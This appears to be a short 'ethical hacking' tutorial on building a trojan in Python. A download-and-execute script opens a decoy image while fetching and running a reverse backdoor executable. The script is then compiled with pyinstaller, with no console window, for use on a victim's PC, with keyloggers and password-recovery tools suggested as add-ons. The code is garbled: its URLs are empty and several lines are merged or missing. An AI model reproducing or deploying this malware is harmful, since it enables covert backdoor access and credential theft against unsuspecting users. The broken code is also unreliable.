Python Ethical Hacking - TROJANS Analysis(1)
A trojan is a file that looks and functions as a normal file(image, pdf, song ..etc).
When executed:
1. Opens the normal file that the user expects.
2. Executes evil code in the background (run a backdoor/keylogger ..etc).
Download & Execute Payload
- A generic executable that downloads & executes files.
- Ideas:
- Download backdoor + keylogger.
- Download keylogger + password recovery tool.
- Download keylogger + password recovery tool + backdoor.
- Use it as a trojan -- evil file + a normal file.
Create the download_and_exeucte Python code:
#!/usr/bin/env python
import os
import subprocess
import requests
import tempfile def download(url):
get_response = requests.get(url)
file_name = url.split("/")[-1]
with open(file_name, "wb") as out_file:
out_file.write(get_response.content) temp_directory = tempfile.gettempdir()
print(temp_directory) download("")
subprocess.Popen("Galaxy.jpg", shell=True) download("")"reverse_backdoor.exe", shell=True) os.remove("Galaxy.jpg")
Convert the Python Program to Windows Executable.
wine /root/.wine/drive_c/Program\ Files\ \(x86\)/Python37-/Scripts/pyinstaller.exe --onefile --noconsole
Execute the download_and_execute.exe file on the vitim PC.
The user can only see a normal picture, but the communication has been established background.
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